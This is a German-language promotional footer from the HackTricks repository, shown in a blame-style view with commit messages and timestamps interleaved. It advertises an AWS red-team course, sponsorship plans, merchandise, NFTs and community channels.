<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
arte
2024-01-03 10:42:55 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
Translated to German
2024-02-10 15:36:32 +00:00
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink